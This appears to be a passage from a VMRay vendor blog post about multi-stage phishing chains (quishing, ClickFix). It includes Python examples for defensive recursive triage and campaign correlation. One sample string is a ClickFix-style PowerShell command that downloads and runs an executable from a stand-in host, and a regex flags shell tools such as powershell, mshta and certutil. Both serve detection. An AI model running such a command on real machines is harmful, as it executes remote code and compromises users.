Around the same time, the FBI issued a FLASH alert warning about North Korean state-sponsored group Kimsuky using QR-code-based spear phishing, or “quishing,” against think tanks, academic institutions, and government bodies in the U.S. and NATO-allied countries. The attack pattern was layered: phishing emails impersonating embassy staff or foreign policy advisors contained QR codes in attachments or inline graphics. When victims scanned these codes on their phones, they were routed through attacker-controlled redirectors that fingerprinted the device before serving a mobile-optimized fake login page mimicking Microsoft 365 or Okta. The scan itself is part of the evasion: the gateway only ever sees an image, and the click happens on a personal phone that the organization's web proxy and EDR typically do not cover.
These two examples share a common trait: the initial email is not where the damage happens. The payload sits several layers down, behind documents, QR codes, redirects, clipboard tricks, and legitimate service abuse. At each stage, the attack is designed to look just benign enough to slip past automated defenses.
Why Traditional Tools Struggle
Secure Email Gateways (SEGs) were built for a simpler world. They scan the email, check the attachment, evaluate the URL — and make a decision. But when the email is clean, the attachment is password-protected, the QR code resolves to a redirect chain, and the actual payload only materializes after a ClickFix interaction on a webpage three steps removed from the original message — there’s nothing for the gateway to flag.
This is why so many of these attacks are caught not by automated defenses, but by users themselves. User-reported phishing has become one of the most valuable signal sources for SOC teams. But it creates a different problem: volume and speed. When a user reports a suspicious email, the analyst needs to determine whether it’s a real threat — fast. And for a multi-stage delivery chain, that means manually opening attachments, extracting URLs, following redirects, clicking through CAPTCHAs, and piecing together a kill chain that spans multiple files and web pages.
It’s a full investigation. And when your SOC is processing hundreds of user reports a day, doing it manually for every one is simply not sustainable.
What Effective Triage Actually Requires
To handle these attacks at scale, you need a tool that behaves the way a skilled analyst would — but automatically:
It needs to go beyond the initial sample. When a user-reported email contains a PDF with a QR code, the tool should decode that QR code, follow the URL, interact with the landing page, and keep going until it reaches the final payload. When a password-protected Word file is attached, it should find the password in the email body and use it to open the document. When a webpage places a script on the clipboard, it should capture that content and analyze it separately.
It needs to do this recursively, without human intervention. Each artifact extracted during analysis — a URL from a document, a file downloaded during page interaction, clipboard content from a pastejacking site — should be automatically resubmitted for its own analysis. This is what “following the chain” means in practice: not stopping at the first layer, but methodically working through every stage until the full attack path is exposed.
And critically, it needs to present the result in a way that lets the analyst understand what happened at a glance — without clicking through dozens of individual analysis reports.
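As an added illustration of that loop (example code written for this page, not VMRay's engine or anything it exposes), the Python below models recursive triage of a user-reported email. The attachment contents, the attacker-side web tier (`WEB`) and the email body are constructed sample data; QR decoding and real sandbox detonation cannot run offline here, so the document stage carries a plain URL and the final download is judged by its PE header as a stand-in. Every artifact a stage emits is queued for its own analysis, a digest-based seen set stops redirect loops, a depth limit caps runaway chains, a password found in the email body is carried to the attachment stage, and the worst verdict anywhere in the chain rolls up to the report.

```python
"""Recursive 'follow the chain' triage of a user-reported email (added example)."""
import hashlib
import re
from dataclasses import dataclass

MAX_DEPTH = 8  # hard stop: a redirect loop or an endless decoy must not keep the job alive

# Constructed sample data: parsed attachments (name -> (password, text)) and the attacker's web tier.
ATTACHMENTS = {"Invoice.docx": ("Inv2026", "Your invoice is ready: http://cdn-docs.example/view")}
WEB = {  # URL -> what a fetch returns: a redirect hop, an HTML page or a binary download
    "http://cdn-docs.example/view": {"redirect": "http://verify.example/step"},
    "http://verify.example/step": {"html": """<h1>Verify you are human</h1>
<script>navigator.clipboard.writeText('powershell -w hidden -c "iwr http://dl.example/update.exe -OutFile u.exe; ./u.exe"');</script>"""},
    "http://dl.example/update.exe": {"exe": "MZ\x90\x00..."},
    "http://loop.example/a": {"redirect": "http://loop.example/b"},  # redirect loop
    "http://loop.example/b": {"redirect": "http://loop.example/a"},
}
EMAIL = {"body": "Hi, invoice attached. Document password is: Inv2026", "attachments": ["Invoice.docx"]}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
PASSWORD_RE = re.compile(r"password\s*(?:is)?\s*[:=]?\s*(\S+)", re.I)
CLIP_RE = re.compile(r"navigator\.clipboard\.writeText\((['\"])(.*?)\1\)", re.S)
LOLBIN_RE = re.compile(r"\b(?:powershell|mshta|cmd\.exe|certutil)\b|\|\s*(?:sh|bash)\b", re.I)
SEVERITY = {"clean": 0, "unknown": 1, "suspicious": 2, "malicious": 3}

@dataclass
class Node:
    kind: str        # email, docx, url, html, clipboard, file
    content: object
    depth: int
    parent: object = None
    verdict: str = "unknown"

    @property
    def digest(self) -> str:  # identity of an artifact, so each one is analyzed exactly once
        return hashlib.sha256(f"{self.kind}:{self.content!r}".encode()).hexdigest()[:12]

    def label(self) -> str:
        return f"{self.kind}:{self.content if self.kind in ('url', 'docx') else self.digest}"

# Each analyzer returns (verdict, child artifacts as (kind, content)); children get queued.
def analyze_email(node, ctx):
    m = PASSWORD_RE.search(node.content["body"])
    if m:
        ctx["password"] = m.group(1).rstrip(".")  # keep it for the attachment stage
    return "clean", [("docx", n) for n in node.content["attachments"]]

def analyze_docx(node, ctx):
    password, text = ATTACHMENTS[node.content]
    if password and ctx.get("password") != password:
        return "unknown", []  # could not open it: the chain stops here and needs a human
    return "clean", [("url", u) for u in URL_RE.findall(text)]

def analyze_url(node, ctx):
    resp = WEB.get(node.content, {})  # empty: dead, geofenced or rate-limited, do not guess
    if "redirect" in resp:
        return "clean", [("url", resp["redirect"])]
    if "html" in resp:
        return "clean", [("html", resp["html"])]
    return ("clean", [("file", resp["exe"])]) if "exe" in resp else ("unknown", [])

def analyze_html(node, ctx):
    clips = [("clipboard", m.group(2)) for m in CLIP_RE.finditer(node.content)]
    # a page that silently writes to the clipboard is the ClickFix/pastejacking tell
    return ("suspicious" if clips else "clean"), clips

def analyze_clipboard(node, ctx):
    verdict = "malicious" if LOLBIN_RE.search(node.content) else "suspicious"
    return verdict, [("url", u) for u in URL_RE.findall(node.content)]

def analyze_file(node, ctx):  # stand-in for detonating the download in a sandbox
    return ("malicious" if node.content.startswith("MZ") else "clean"), []

ANALYZERS = {"email": analyze_email, "docx": analyze_docx, "url": analyze_url,
             "html": analyze_html, "clipboard": analyze_clipboard, "file": analyze_file}

def follow_chain(kind, content):
    """Breadth-first: every artifact an analyzer emits gets its own analysis."""
    root = Node(kind, content, 0)
    ctx, seen, queue, nodes = {}, {root.digest}, [root], [root]
    while queue:
        node = queue.pop(0)
        node.verdict, children = ANALYZERS[node.kind](node, ctx)
        if node.depth >= MAX_DEPTH:
            continue  # verdict is recorded, but stop descending
        for child_kind, child_content in children:
            child = Node(child_kind, child_content, node.depth + 1, parent=node)
            if child.digest in seen:  # redirect loop or the same artifact reached twice
                continue
            seen.add(child.digest)
            nodes.append(child)
            queue.append(child)
    return nodes

def chain_edges(nodes):  # (parent, child, child verdict): what a delivery-chain graph renders
    return [(n.parent.label(), n.label(), n.verdict) for n in nodes if n.parent]

def overall_verdict(nodes):  # the worst verdict anywhere in the chain cascades to the report
    return max((n.verdict for n in nodes), key=SEVERITY.__getitem__)
```

Running `chain_edges(follow_chain("email", EMAIL))` yields seven edges: the email, the document and the two redirector URLs come back clean, the landing page is flagged suspicious for its clipboard write, the pasted PowerShell is malicious, and the download it fetches is the malicious node three layers deep. Two failure modes are worth noting: without the password in the body the document node stays `unknown` and the chain ends there (a human has to look), and a URL that loops back to itself is visited once and dropped.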
How VMRay Tackles This: Visualize Delivery Chains
VMRay’s recursive analysis engine has been doing this work automatically for years — extracting and resubmitting actionable content from every stage of an attack: URLs from documents, decoded QR codes (including obfuscated and stylized variants), password-protected attachments opened with the password found in the message, clipboard content from ClickFix pages, and files downloaded during dynamic analysis. Each artifact gets its own sandbox analysis, and the results cascade down the chain.
What’s new in the VMRay Platform 2026.1.0 release is how all of this is surfaced to the analyst.
The redesigned Relations Tab now renders the entire delivery chain as a single, interactive graph. From the initial email or file submission all the way to the final payload — every artifact, every relationship, every verdict — mapped in one view. Nodes are color-coded by verdict, so the analyst can immediately see where in the chain things turned malicious: which attachment was clean noise, which URL was a decoy, and which download three layers deep was the actual threat.
For an L1 analyst triaging user-reported phishing, this is the difference between spending thirty minutes piecing together an investigation and spending thirty seconds confirming a verdict and escalating.
Uncovering Campaigns You Didn’t Know Existed
This release also introduces cross-sample campaign correlation. When separate submissions — different emails, reported by different users, days apart — share any malicious artifact anywhere in the delivery chain, VMRay automatically links them on the same graph.
This isn’t matching on sender addresses or the hash of the submitted file. It’s correlation on artifacts that only exist inside VMRay’s recursive analysis: decoded QR payloads, clipboard scripts, intermediate downloads that the sandbox itself pulled down, none of which show up in mail logs or EDR telemetry for a recipient who never clicked. Coordinated campaigns surface on their own, changing the question from “is this email malicious?” to “is this email part of something bigger?”
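To make the linking rule concrete, the added Python below (written for this page, not VMRay's implementation) clusters constructed triage results by artifacts shared anywhere in their delivery chains. The report ids, artifact labels and verdicts are made-up sample data standing in for content hashes. The rule it encodes: only artifacts with a linking verdict (malicious by default) connect submissions, so the benign Microsoft login page that every report ends on never joins unrelated reports, and an optional prevalence cap keeps a kit component shared across the whole queue from merging everything into one campaign.

```python
"""Cross-submission campaign correlation on shared chain artifacts (added example)."""
from collections import defaultdict

# Constructed triage results: report id -> artifacts found anywhere in its chain, as
# (artifact label, verdict). Labels stand in for content digests of the artifacts.
SUBMISSIONS = {
    "report-0001": [("url:https://login.microsoftonline.com/", "clean"),
                    ("url:http://verify.example/step", "suspicious"),
                    ("clipboard:a1f3c9e2", "malicious")],
    "report-0002": [("url:https://login.microsoftonline.com/", "clean"),
                    ("url:http://vrfy.example/go", "suspicious"),   # different redirector
                    ("clipboard:a1f3c9e2", "malicious"),            # same pasted script
                    ("file:9c2e7b41", "malicious")],
    "report-0003": [("url:http://vrfy.example/go", "suspicious"),
                    ("file:9c2e7b41", "malicious")],                # same payload, no clipboard stage
    "report-0004": [("url:https://login.microsoftonline.com/", "clean"),  # benign overlap only
                    ("docx:Agenda.docx", "clean")],
    "report-0005": [("clipboard:77b05d10", "malicious")],           # unrelated campaign
    "report-0006": [("url:http://vrfy.example/go", "suspicious")],  # redirector only, payload never reached
}

def correlate(submissions, link_on=frozenset({"malicious"}), max_share=None):
    """Return (campaigns, links): clusters of report ids that share an artifact whose
    verdict is in link_on, and the linking artifacts with the reports each one touches.
    max_share drops artifacts seen in more than that many reports (too common to be a signal)."""
    by_artifact = defaultdict(set)
    for sid, artifacts in submissions.items():
        for label, verdict in artifacts:
            if verdict in link_on:  # clean artifacts never link anything
                by_artifact[label].add(sid)
    links = {label: sorted(sids) for label, sids in by_artifact.items()
             if len(sids) > 1 and (max_share is None or len(sids) <= max_share)}

    parent = {sid: sid for sid in submissions}  # union-find over report ids
    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x
    for sids in links.values():
        for other in sids[1:]:
            parent[find(other)] = find(sids[0])

    groups = defaultdict(list)
    for sid in submissions:
        groups[find(sid)].append(sid)
    campaigns = sorted(sorted(g) for g in groups.values() if len(g) > 1)
    return campaigns, links

if __name__ == "__main__":
    campaigns, links = correlate(SUBMISSIONS)
    for members in campaigns:
        shared = [label for label, sids in links.items() if set(sids) & set(members)]
        print("campaign:", members, "linked by", shared)
```

With the defaults, reports 0001 through 0003 form one campaign (0001 and 0002 share the clipboard script, 0002 and 0003 share the payload), while 0004 stays unlinked despite sharing the real Microsoft URL with two of them. Widening `link_on` to include `suspicious` pulls in 0006 through the shared redirector, which is the trade-off to weigh: more coverage of reports where the chain died before the payload, at the cost of linking on weaker evidence.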
The Bottom Line
Multi-stage delivery chains are the new playbook. Responding to them requires a tool that follows the attack automatically, recursively, and completely — and then makes the result understandable at a glance. That’s what the VMRay Platform was built to do, and with Visualize Delivery Chains, what the engine uncovers is now as clear as the threats themselves.
Sources:
https://www.microsoft.com/en-us/security/blog/2026/03/19/when-tax-season-becomes-cyberattack-season-phishing-and-malware-campaigns-using-tax-related-lures/#:~:text=QR%20code%20and%20W2%20lure,primarily%20in%20the%20United%20States.
https://www.cybersecurityintelligence.com/blog/n-korean-quishing-attacks-targeting-nato-members-9035.html